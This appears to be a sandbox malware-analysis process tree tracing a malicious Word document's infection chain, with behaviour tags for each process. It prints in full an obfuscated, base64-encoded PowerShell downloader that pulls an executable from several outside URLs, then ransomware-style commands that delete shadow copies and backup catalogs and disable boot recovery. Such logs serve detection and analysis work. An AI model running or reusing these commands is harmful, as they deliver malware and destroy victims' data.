cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkADQANwB6AHUAMwAgACAAPQAgACAAWwB0AHkAUABFAF0AKAAiAHsAMgB9AHsAMQB9AHsAMwB9AHsAMAB9ACIAIAAtAGYAIAAnAHQATwBSAHkAJwAsACcAZQBtAC4AaQBPAC4ARAAnACwAJwBzAHkAUwBUACcALAAnAGkAUgBFAEMAJwApACAAIAA7ACAAIAAgAHMARQB0ACAAIABOAGgAdABNACAAIAAoAFsAdABZAHAARQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADkAfQB7ADcAfQB7ADEAfQB7ADAAfQB7ADYAfQB7ADgAfQB7ADMAfQAiACAALQBGACAAJwBlACcALAAnAHMAJwAsACcAZQAnACwAJwBOAEEAZwBlAFIAJwAsACcAcwBZAFMAdAAnACwAJwBtAC4AbgAnACwAJwBSAHYASQBDAEUAUABPAEkATgAnACwAJwBUAC4AJwAsACcAdABNAEEAJwAsACcARQAnACkAIAApACAAIAA7ACQAQgBmAG8AeABnAGEAMAA9ACgAJwBRACcAKwAoACcAdwBuAHkAOAAnACsAJwA4ADQAJwApACkAOwAkAFcAdwBwAHAANQA0AHgAPQAkAEIAYQAyAHIAZAA5ADgAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEIAMQBoAGsAdgAyAG0AOwAkAFEAdABuAHkAbwBfAHcAPQAoACcATABpACcAKwAoACcAYwA4AHkAJwArACcAMQAnACkAKwAnAHkAJwApADsAIAAgACQANAA3AHoAVQAzADoAOgAiAGMAYABSAEUAQQBUAGAAZQBgAEQAaQByAGAARQBDAFQATwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAHIAaQBHAFcAbwBpACcAKwAnADEAJwArACcAcwAnACsAJwBhACcAKQArACgAJwBvAHIAJwArACcAaQAnACkAKwAoACcARwAnACsAJwBNAGYAJwApACsAJwAzAG8AJwArACcAZwBoACcAKwAoACcAXwAnACsAJwByAGkARwAnACkAKQAuACIAUgBFAGAAUABsAEEAQwBFACIAKAAoAFsAQwBoAEEAUgBdADEAMQA0ACsAWwBDAGgAQQBSAF0AMQAwADUAKwBbAEMAaABBAFIAXQA3ADEAKQAsACcAXAAnACkAKQApADsAJABKAHkAbQBnAHIAcwA0AD0AKAAoACcARwAnACsAJwBrAHYAJwApACsAJwByADUAJwArACcAeQBwACcAKQA7ACAAKAAgAGcASQAgACAAVgBBAFIAaQBhAGIAbABlADoAbgBIAHQATQAgACkALgBWAEEATAB1AGUAOgA6ACIAcwBlAEMAVQBgAFIAaQBUAGAAeQBwAFIAYABPAFQAYABvAEMATwBsACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABIADEAYgBvAHUAZQAxAD0AKAAoACcASwAnACsAJwA3AGIANgAnACkAKwAoACcANgBfACcAKwAnAHIAJwApACkAOwAkAFgAegA0AHgANgBsAHgAIAA9ACAAKAAoACcAQgAnACsAJwB3ADkAJwApACsAKAAnADkAbwAnACsAJwBmACcAKQArACcAZwAnACkAOwAkAFQAaQBwAGUAbwBmAGIAPQAoACgAJwBVAGYAJwArACcAeAA5ACcAKQArACcAegAnACsAJwBrAGIAJwApADsAJABZAGoAMwB2AHEAOQBrAD0AKAAnAFYAJwArACgAJwBpAHAAaAAnACsAJwAxAHMAJwArACcAcwAnACkAKQA7ACQASgAzAGUAaABrAG0AbQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AFcAbwBpACcAKwAnADEAcwBhAG8AewAwACcAKwAnAH0ATQBmADMAbwBnACcAKwAnAGgAXwAnACsAJwB7ADAAfQAnACkAIAAgAC0AZgAgACAAWwBjAGgAYQByAF0AOQAyACkAKwAkAFgAegA0AHgANgBsAHgAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABPADgAeABsADEAdwB6AD0AKAAnAFYAJwArACgAJwBqACcAKwAnAGMAMQBtACcAKwAnAHQAeQAnACkAKQA7ACQARwB1ADMAdwByAHgAaQA9AG4ARQB3AC0ATwBCAGAAagBgAGUAQwBUACAATgBlAFQALgB3AGUAQgBjAEwASQBlAG4AVAA7ACQAWAA1ADMAeQBjAF8ANgA9ACgAKAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKwAnADoAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnACkAVwAnACkAKQArACgAKAAnAE4AKQAnACsAJwAoACkAKAAnACkAKQArACcAKQAnACsAKAAoACcAVwAnACsAJwBOACkAJwApACkAKwAoACgAJwAoAHYAJwApACkAKwAoACcAaQBkACcAKwAnAHIAaQBvAGkAbgAnACkAKwAnAGQAJwArACcAdQAnACsAJwBzAHQAJwArACgAJwByACcAKwAnAGkAYQBsAC4AJwApACsAJwBjACcAKwAoACgAJwBvAG0AKQAnACsAJwAoACkAJwApACkAKwAoACgAJwBXACcAKwAnAE4AKQAnACkAKQArACcAKAAnACsAKAAnAGgANgBtAGsAZwAnACsAJwByAC4AJwApACsAKAAnAHIAJwArACcAYQByAEAAJwApACsAJwBoAHQAJwArACcAdAAnACsAKAAoACcAcAA6ACcAKwAnACkAKAApACcAKwAnAFcATgApACgAKQAoACcAKQApACsAKAAoACcAKQAnACsAJwBXAE4AKQAnACkAKQArACgAKAAnACgAZgAnACkAKQArACgAJwBvAHIAYwBlACcAKwAnAGMAJwArACcAYQAnACkAKwAoACcAcgAnACsAJwBlAGUAJwApACsAJwByAC4AJwArACcAYwBvACcAKwAnAG0AJwArACcAKQAnACsAKAAoACcAKAApAFcAJwArACcATgApACcAKQApACsAJwAoACcAKwAoACcAZQAnACsAJwBmAGYAJwApACsAKAAnAG8AOAAnACsAJwB5ACcAKQArACcAdQAnACsAKAAnAC4AcgAnACsAJwBhAHIAJwApACsAKAAnAEAAJwArACcAaAB0AHQAJwApACsAJwBwADoAJwArACgAKAAnACkAKAApAFcATgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwApACgAKQBXAE4AJwArACcAKQAoAG8AJwArACcAbgAnACkAKQArACcAdwAuACcAKwAnAGsAJwArACcAeAAxACcAKwAnAC4AaQAnACsAKAAoACcAbgApACcAKQApACsAKAAoACcAKAApAFcAJwArACcATgApACcAKQApACsAKAAoACcAKABkAGEAJwArACcAdgA0ADMAYQA1ACcAKwAnAGsAcQAnACkAKQArACgAJwAuACcAKwAnAHIAYQByACcAKQArACcAQABoACcAKwAnAHQAJwArACcAdAAnACsAKAAoACcAcAA6ACkAJwArACcAKAAnACkAKQArACgAKAAnACkAVwAnACsAJwBOACkAKAAnACsAJwApACgAJwApACkAKwAoACgAJwApAFcATgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwBoAG8AcwAzADYANQBsACcAKQApACsAKAAoACcAbAAnACsAJwBjAC4AYwBvAG0AKQAoACkAJwApACkAKwAnAFcATgAnACsAKAAoACcAKQAoACcAKQApACsAJwBoAGMAJwArACgAJwBpACcAKwAnADAAeABuACcAKQArACcAMAAnACsAKAAnAC4AegBpACcAKwAnAHAAQABoAHQAdAAnACkAKwAoACgAJwBwADoAKQAnACsAJwAoACkAVwAnACkAKQArACgAKAAnAE4AKQAnACkAKQArACgAKAAnACgAKQAnACsAJwAoACcAKQApACsAKAAoACcAKQBXACcAKQApACsAKAAoACcATgApACcAKQApACsAKAAoACcAKAB0ACcAKwAnAGUAcwB0ACcAKQApACsAKAAnAHcAJwArACcAZQBiACcAKQArACgAJwBzAGkAdABlACcAKwAnAC4AdABhACcAKwAnAHgAYQAnACsAJwB1AGMAJwApACsAKAAnAHQAaQAnACsAJwBvAG4AJwApACsAJwBpACcAKwAnAG4AdgAnACsAJwBlACcAKwAnAHMAJwArACgAJwB0AG8AcgAnACsAJwBzACcAKQArACgAKAAnAC4AYwAnACsAJwBvAG0AKQAoACkAJwArACcAVwBOACkAJwApACkAKwAoACgAJwAoAHgAJwArACcAdQBnACcAKQApACsAKAAnAGkAbgAnACsAJwAzACcAKQArACgAJwBxAHUALgB6AGkAJwArACcAcAAnACkAKwAnAEAAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwApACgAKQAnACkAKQArACcAVwAnACsAKAAoACcATgApACgAKQAoACkAJwArACcAVwBOACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAaAByAGEAZABoAGEAJwApACkAKwAnAGoAJwArACgAJwBlACcAKwAnAHcAZQBsAGwAJwApACsAJwBlACcAKwAoACgAJwByAHMALgBjACcAKwAnAG8AbQApACcAKQApACsAKAAnACgAJwArACcAKQBXACcAKQArACgAKAAnAE4AKQAoACcAKwAnAHUAJwApACkAKwAoACcAMAAnACsAJwA1AGcAJwApACsAJwBxACcAKwAoACcAMQBqACcAKwAnAGoAJwApACsAKAAoACcALgByACcAKwAnAGEAcgBAAGgAdAB0AHAAcwA6ACcAKwAnACkAKAAnACkAKQArACgAKAAnACkAJwArACcAVwBOACkAJwApACkAKwAoACcAKAApACcAKwAnACgAKQAnACkAKwAnAFcATgAnACsAJwApACcAKwAoACgAJwAoAGUAZAB1AGMAYQB0ACcAKwAnAGkAJwApACkAKwAoACgAJwBvACcAKwAnAG4AbQBpAGwAbAAnACsAJwBpAG8AbgAuAGMAbwAnACsAJwBtACkAKAAnACsAJwApACcAKQApACsAKAAoACcAVwAnACsAJwBOACkAJwApACkAKwAoACgAJwAoAHkAOAAnACsAJwBoADAAMQB0ACcAKwAnAGcANQA3AC4AcABkACcAKQApACsAKAAoACcAZgBAACcAKwAnAGgAdAB0AHAAJwArACcAOgApACgAKQBXACcAKwAnAE4AKQAoACkAKAApAFcAJwArACcATgApACcAKQApACsAKAAoACcAKABnACcAKQApACsAJwBlAG8AJwArACgAKAAnAHoAbwBuACcAKwAnAGUALgAnACsAJwBhAHQAJwArACcAKQAoACcAKwAnACkAVwBOACcAKwAnACkAKABkAGUAegAnACkAKQArACgAJwBoACcAKwAnAGkAeQB6ACcAKQArACcAbQAnACsAKAAnAC4AegAnACsAJwBpAHAAJwApACkAKQAuACIAUgBgAGUAcABgAEwAYQBjAGUAIgAoACgAKAAoACgAJwApACgAJwApACkAKwAoACgAJwApAFcAJwApACkAKwAoACgAJwBOACcAKwAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAHgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAcABgAEwAaQB0ACIAKAAkAFAAMQBhAGYAbwB3AHkAIAArACAAJABXAHcAcABwADUANAB4ACAAKwAgACQAWQBnAGwAZgAxADYAYwApADsAJABRAHQAbwAzAHkAMQB0AD0AKAAnAFAAcwAnACsAKAAnADIAaAAnACsAJwA2AHUAOAAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgB6AHYAdQBkAHIAegAgAGkAbgAgACQAWAA1ADMAeQBjAF8ANgAgAHwAIABzAE8AcgB0AC0AYABPAEIASgBFAGAAYwBUACAAewBnAEUAdAAtAGAAUgBgAEEAbgBEAE8ATQB9ACkAewB0AHIAeQB7ACQARwB1ADMAdwByAHgAaQAuACIARABgAE8AdwBgAE4AbABvAGEARABmAEkAbABlACIAKAAkAEYAegB2AHUAZAByAHoALAAgACQASgAzAGUAaABrAG0AbQApADsAJABQAHkAdwBhAHMAbgAyAD0AKAAoACcARwAnACsAJwA0AG4AdAAnACkAKwAoACcAawAnACsAJwB0AHUAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQASgAzAGUAaABrAG0AbQApAC4AIgBMAEUAYABOAGAAZwBUAGgAIgAgAC0AZwBlACAANAA5ADgAOAAxACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACgAJwB3AGkAJwArACcAbgAzADIAJwApACsAJwBfACcAKwAnAFAAJwArACgAJwByAG8AYwAnACsAJwBlACcAKQArACcAcwBzACcAKQApAC4AIgBjAFIAYABlAGAAQQBUAEUAIgAoACQASgAzAGUAaABrAG0AbQApADsAJABVAGQANQBlADcAZAA3AD0AKAAnAFIAJwArACgAJwB1ACcAKwAnADcANwByACcAKwAnADAAbwAnACkAKQA7AGIAcgBlAGEAawA7ACQAQQB1AGIAaQBiADQAagA9ACgAJwBMACcAKwAnAHQAJwArACgAJwA2ACcAKwAnAG4AXwBhAGIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAXwBjAHIAYwBnADEAPQAoACgAJwBUACcAKwAnADUANQAnACkAKwAnADQANwAnACsAJwBjADMAJwApAA==
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2100

C:\Windows\system32\msg.exe
msg Admin /v Word experienced an error trying to open the file.
2⤵
PID:2716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POwersheLL -w hidden -ENCOD IAAkADQANwB6AHUAMwAgACAAPQAgACAAWwB0AHkAUABFAF0AKAAiAHsAMgB9AHsAMQB9AHsAMwB9AHsAMAB9ACIAIAAtAGYAIAAnAHQATwBSAHkAJwAsACcAZQBtAC4AaQBPAC4ARAAnACwAJwBzAHkAUwBUACcALAAnAGkAUgBFAEMAJwApACAAIAA7ACAAIAAgAHMARQB0ACAAIABOAGgAdABNACAAIAAoAFsAdABZAHAARQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADkAfQB7ADcAfQB7ADEAfQB7ADAAfQB7ADYAfQB7ADgAfQB7ADMAfQAiACAALQBGACAAJwBlACcALAAnAHMAJwAsACcAZQAnACwAJwBOAEEAZwBlAFIAJwAsACcAcwBZAFMAdAAnACwAJwBtAC4AbgAnACwAJwBSAHYASQBDAEUAUABPAEkATgAnACwAJwBUAC4AJwAsACcAdABNAEEAJwAsACcARQAnACkAIAApACAAIAA7ACQAQgBmAG8AeABnAGEAMAA9ACgAJwBRACcAKwAoACcAdwBuAHkAOAAnACsAJwA4ADQAJwApACkAOwAkAFcAdwBwAHAANQA0AHgAPQAkAEIAYQAyAHIAZAA5ADgAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEIAMQBoAGsAdgAyAG0AOwAkAFEAdABuAHkAbwBfAHcAPQAoACcATABpACcAKwAoACcAYwA4AHkAJwArACcAMQAnACkAKwAnAHkAJwApADsAIAAgACQANAA3AHoAVQAzADoAOgAiAGMAYABSAEUAQQBUAGAAZQBgAEQAaQByAGAARQBDAFQATwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAHIAaQBHAFcAbwBpACcAKwAnADEAJwArACcAcwAnACsAJwBhACcAKQArACgAJwBvAHIAJwArACcAaQAnACkAKwAoACcARwAnACsAJwBNAGYAJwApACsAJwAzAG8AJwArACcAZwBoACcAKwAoACcAXwAnACsAJwByAGkARwAnACkAKQAuACIAUgBFAGAAUABsAEEAQwBFACIAKAAoAFsAQwBoAEEAUgBdADEAMQA0ACsAWwBDAGgAQQBSAF0AMQAwADUAKwBbAEMAaABBAFIAXQA3ADEAKQAsACcAXAAnACkAKQApADsAJABKAHkAbQBnAHIAcwA0AD0AKAAoACcARwAnACsAJwBrAHYAJwApACsAJwByADUAJwArACcAeQBwACcAKQA7ACAAKAAgAGcASQAgACAAVgBBAFIAaQBhAGIAbABlADoAbgBIAHQATQAgACkALgBWAEEATAB1AGUAOgA6ACIAcwBlAEMAVQBgAFIAaQBUAGAAeQBwAFIAYABPAFQAYABvAEMATwBsACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABIADEAYgBvAHUAZQAxAD0AKAAoACcASwAnACsAJwA3AGIANgAnACkAKwAoACcANgBfACcAKwAnAHIAJwApACkAOwAkAFgAegA0AHgANgBsAHgAIAA9ACAAKAAoACcAQgAnACsAJwB3ADkAJwApACsAKAAnADkAbwAnACsAJwBmACcAKQArACcAZwAnACkAOwAkAFQAaQBwAGUAbwBmAGIAPQAoACgAJwBVAGYAJwArACcAeAA5ACcAKQArACcAegAnACsAJwBrAGIAJwApADsAJABZAGoAMwB2AHEAOQBrAD0AKAAnAFYAJwArACgAJwBpAHAAaAAnACsAJwAxAHMAJwArACcAcwAnACkAKQA7ACQASgAzAGUAaABrAG0AbQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AFcAbwBpACcAKwAnADEAcwBhAG8AewAwACcAKwAnAH0ATQBmADMAbwBnACcAKwAnAGgAXwAnACsAJwB7ADAAfQAnACkAIAAgAC0AZgAgACAAWwBjAGgAYQByAF0AOQAyACkAKwAkAFgAegA0AHgANgBsAHgAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABPADgAeABsADEAdwB6AD0AKAAnAFYAJwArACgAJwBqACcAKwAnAGMAMQBtACcAKwAnAHQAeQAnACkAKQA7ACQARwB1ADMAdwByAHgAaQA9AG4ARQB3AC0ATwBCAGAAagBgAGUAQwBUACAATgBlAFQALgB3AGUAQgBjAEwASQBlAG4AVAA7ACQAWAA1ADMAeQBjAF8ANgA9ACgAKAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKwAnADoAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnACkAVwAnACkAKQArACgAKAAnAE4AKQAnACsAJwAoACkAKAAnACkAKQArACcAKQAnACsAKAAoACcAVwAnACsAJwBOACkAJwApACkAKwAoACgAJwAoAHYAJwApACkAKwAoACcAaQBkACcAKwAnAHIAaQBvAGkAbgAnACkAKwAnAGQAJwArACcAdQAnACsAJwBzAHQAJwArACgAJwByACcAKwAnAGkAYQBsAC4AJwApACsAJwBjACcAKwAoACgAJwBvAG0AKQAnACsAJwAoACkAJwApACkAKwAoACgAJwBXACcAKwAnAE4AKQAnACkAKQArACcAKAAnACsAKAAnAGgANgBtAGsAZwAnACsAJwByAC4AJwApACsAKAAnAHIAJwArACcAYQByAEAAJwApACsAJwBoAHQAJwArACcAdAAnACsAKAAoACcAcAA6ACcAKwAnACkAKAApACcAKwAnAFcATgApACgAKQAoACcAKQApACsAKAAoACcAKQAnACsAJwBXAE4AKQAnACkAKQArACgAKAAnACgAZgAnACkAKQArACgAJwBvAHIAYwBlACcAKwAnAGMAJwArACcAYQAnACkAKwAoACcAcgAnACsAJwBlAGUAJwApACsAJwByAC4AJwArACcAYwBvACcAKwAnAG0AJwArACcAKQAnACsAKAAoACcAKAApAFcAJwArACcATgApACcAKQApACsAJwAoACcAKwAoACcAZQAnACsAJwBmAGYAJwApACsAKAAnAG8AOAAnACsAJwB5ACcAKQArACcAdQAnACsAKAAnAC4AcgAnACsAJwBhAHIAJwApACsAKAAnAEAAJwArACcAaAB0AHQAJwApACsAJwBwADoAJwArACgAKAAnACkAKAApAFcATgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwApACgAKQBXAE4AJwArACcAKQAoAG8AJwArACcAbgAnACkAKQArACcAdwAuACcAKwAnAGsAJwArACcAeAAxACcAKwAnAC4AaQAnACsAKAAoACcAbgApACcAKQApACsAKAAoACcAKAApAFcAJwArACcATgApACcAKQApACsAKAAoACcAKABkAGEAJwArACcAdgA0ADMAYQA1ACcAKwAnAGsAcQAnACkAKQArACgAJwAuACcAKwAnAHIAYQByACcAKQArACcAQABoACcAKwAnAHQAJwArACcAdAAnACsAKAAoACcAcAA6ACkAJwArACcAKAAnACkAKQArACgAKAAnACkAVwAnACsAJwBOACkAKAAnACsAJwApACgAJwApACkAKwAoACgAJwApAFcATgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwBoAG8AcwAzADYANQBsACcAKQApACsAKAAoACcAbAAnACsAJwBjAC4AYwBvAG0AKQAoACkAJwApACkAKwAnAFcATgAnACsAKAAoACcAKQAoACcAKQApACsAJwBoAGMAJwArACgAJwBpACcAKwAnADAAeABuACcAKQArACcAMAAnACsAKAAnAC4AegBpACcAKwAnAHAAQABoAHQAdAAnACkAKwAoACgAJwBwADoAKQAnACsAJwAoACkAVwAnACkAKQArACgAKAAnAE4AKQAnACkAKQArACgAKAAnACgAKQAnACsAJwAoACcAKQApACsAKAAoACcAKQBXACcAKQApACsAKAAoACcATgApACcAKQApACsAKAAoACcAKAB0ACcAKwAnAGUAcwB0ACcAKQApACsAKAAnAHcAJwArACcAZQBiACcAKQArACgAJwBzAGkAdABlACcAKwAnAC4AdABhACcAKwAnAHgAYQAnACsAJwB1AGMAJwApACsAKAAnAHQAaQAnACsAJwBvAG4AJwApACsAJwBpACcAKwAnAG4AdgAnACsAJwBlACcAKwAnAHMAJwArACgAJwB0AG8AcgAnACsAJwBzACcAKQArACgAKAAnAC4AYwAnACsAJwBvAG0AKQAoACkAJwArACcAVwBOACkAJwApACkAKwAoACgAJwAoAHgAJwArACcAdQBnACcAKQApACsAKAAnAGkAbgAnACsAJwAzACcAKQArACgAJwBxAHUALgB6AGkAJwArACcAcAAnACkAKwAnAEAAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwApACgAKQAnACkAKQArACcAVwAnACsAKAAoACcATgApACgAKQAoACkAJwArACcAVwBOACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAaAByAGEAZABoAGEAJwApACkAKwAnAGoAJwArACgAJwBlACcAKwAnAHcAZQBsAGwAJwApACsAJwBlACcAKwAoACgAJwByAHMALgBjACcAKwAnAG8AbQApACcAKQApACsAKAAnACgAJwArACcAKQBXACcAKQArACgAKAAnAE4AKQAoACcAKwAnAHUAJwApACkAKwAoACcAMAAnACsAJwA1AGcAJwApACsAJwBxACcAKwAoACcAMQBqACcAKwAnAGoAJwApACsAKAAoACcALgByACcAKwAnAGEAcgBAAGgAdAB0AHAAcwA6ACcAKwAnACkAKAAnACkAKQArACgAKAAnACkAJwArACcAVwBOACkAJwApACkAKwAoACcAKAApACcAKwAnACgAKQAnACkAKwAnAFcATgAnACsAJwApACcAKwAoACgAJwAoAGUAZAB1AGMAYQB0ACcAKwAnAGkAJwApACkAKwAoACgAJwBvACcAKwAnAG4AbQBpAGwAbAAnACsAJwBpAG8AbgAuAGMAbwAnACsAJwBtACkAKAAnACsAJwApACcAKQApACsAKAAoACcAVwAnACsAJwBOACkAJwApACkAKwAoACgAJwAoAHkAOAAnACsAJwBoADAAMQB0ACcAKwAnAGcANQA3AC4AcABkACcAKQApACsAKAAoACcAZgBAACcAKwAnAGgAdAB0AHAAJwArACcAOgApACgAKQBXACcAKwAnAE4AKQAoACkAKAApAFcAJwArACcATgApACcAKQApACsAKAAoACcAKABnACcAKQApACsAJwBlAG8AJwArACgAKAAnAHoAbwBuACcAKwAnAGUALgAnACsAJwBhAHQAJwArACcAKQAoACcAKwAnACkAVwBOACcAKwAnACkAKABkAGUAegAnACkAKQArACgAJwBoACcAKwAnAGkAeQB6ACcAKQArACcAbQAnACsAKAAnAC4AegAnACsAJwBpAHAAJwApACkAKQAuACIAUgBgAGUAcABgAEwAYQBjAGUAIgAoACgAKAAoACgAJwApACgAJwApACkAKwAoACgAJwApAFcAJwApACkAKwAoACgAJwBOACcAKwAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAHgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAcABgAEwAaQB0ACIAKAAkAFAAMQBhAGYAbwB3AHkAIAArACAAJABXAHcAcABwADUANAB4ACAAKwAgACQAWQBnAGwAZgAxADYAYwApADsAJABRAHQAbwAzAHkAMQB0AD0AKAAnAFAAcwAnACsAKAAnADIAaAAnACsAJwA2AHUAOAAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgB6AHYAdQBkAHIAegAgAGkAbgAgACQAWAA1ADMAeQBjAF8ANgAgAHwAIABzAE8AcgB0AC0AYABPAEIASgBFAGAAYwBUACAAewBnAEUAdAAtAGAAUgBgAEEAbgBEAE8ATQB9ACkAewB0AHIAeQB7ACQARwB1ADMAdwByAHgAaQAuACIARABgAE8AdwBgAE4AbABvAGEARABmAEkAbABlACIAKAAkAEYAegB2AHUAZAByAHoALAAgACQASgAzAGUAaABrAG0AbQApADsAJABQAHkAdwBhAHMAbgAyAD0AKAAoACcARwAnACsAJwA0AG4AdAAnACkAKwAoACcAawAnACsAJwB0AHUAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQASgAzAGUAaABrAG0AbQApAC4AIgBMAEUAYABOAGAAZwBUAGgAIgAgAC0AZwBlACAANAA5ADgAOAAxACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACgAJwB3AGkAJwArACcAbgAzADIAJwApACsAJwBfACcAKwAnAFAAJwArACgAJwByAG8AYwAnACsAJwBlACcAKQArACcAcwBzACcAKQApAC4AIgBjAFIAYABlAGAAQQBUAEUAIgAoACQASgAzAGUAaABrAG0AbQApADsAJABVAGQANQBlADcAZAA3AD0AKAAnAFIAJwArACgAJwB1ACcAKwAnADcANwByACcAKwAnADAAbwAnACkAKQA7AGIAcgBlAGEAawA7ACQAQQB1AGIAaQBiADQAagA9ACgAJwBMACcAKwAnAHQAJwArACgAJwA2ACcAKwAnAG4AXwBhAGIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAXwBjAHIAYwBnADEAPQAoACgAJwBUACcAKwAnADUANQAnACkAKwAnADQANwAnACsAJwBjADMAJwApAA==
2⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3852

C:\Users\Admin\Woi1sao\Mf3ogh_\Bw99ofg.exe
C:\Users\Admin\Woi1sao\Mf3ogh_\Bw99ofg.exe
1⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2164

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ssd\onset\goodram.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:3252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ssd\onset\81ldp.bat" "
3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2092

C:\ssd\onset\15sp.exe
"15sp.exe" e -psion0811 01s.rar
4⤵
- Executes dropped EXE
PID:980

C:\Windows\SysWOW64\timeout.exe
timeout 5
4⤵
- Delays execution with timeout.exe
PID:3148

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ssd\onset\Ztestram.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:1168

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ssd\onset\sata1.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:2532

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\ssd\"
6⤵
- Views/modifies file attributes
PID:3680

C:\Windows\SysWOW64\timeout.exe
timeout 2
6⤵
- Delays execution with timeout.exe
PID:3468

C:\ssd\onset\mesager43.exe
mesager43.exe /start
6⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3704

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -start
7⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:3692

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
8⤵
PID:3992

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:984

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
8⤵
PID:2304

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
8⤵
PID:3780

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
8⤵
PID:1748

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
8⤵
PID:2748

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
9⤵
- Interacts with shadow copies
PID:1620

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
8⤵
PID:3912

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:2740

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
9⤵
- Interacts with shadow copies
PID:2496

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -agent 0
8⤵
- Executes dropped EXE
- Modifies extensions of user files
- Drops file in Program Files directory
PID:1796

C:\Windows\SysWOW64\notepad.exe
notepad.exe
8⤵
PID:3728

C:\Windows\SysWOW64\notepad.exe
notepad.exe
7⤵
PID:3364

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im 15sp.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3424

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im 15sp.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3024

C:\Windows\SysWOW64\attrib.exe
attrib -s -h "C:\ssd\onset\mesager43.exe"
6⤵
- Views/modifies file attributes
PID:2172

C:\Windows\SysWOW64\timeout.exe
timeout 4
6⤵
- Delays execution with timeout.exe
PID:3836

C:\Windows\SysWOW64\timeout.exe
timeout 4
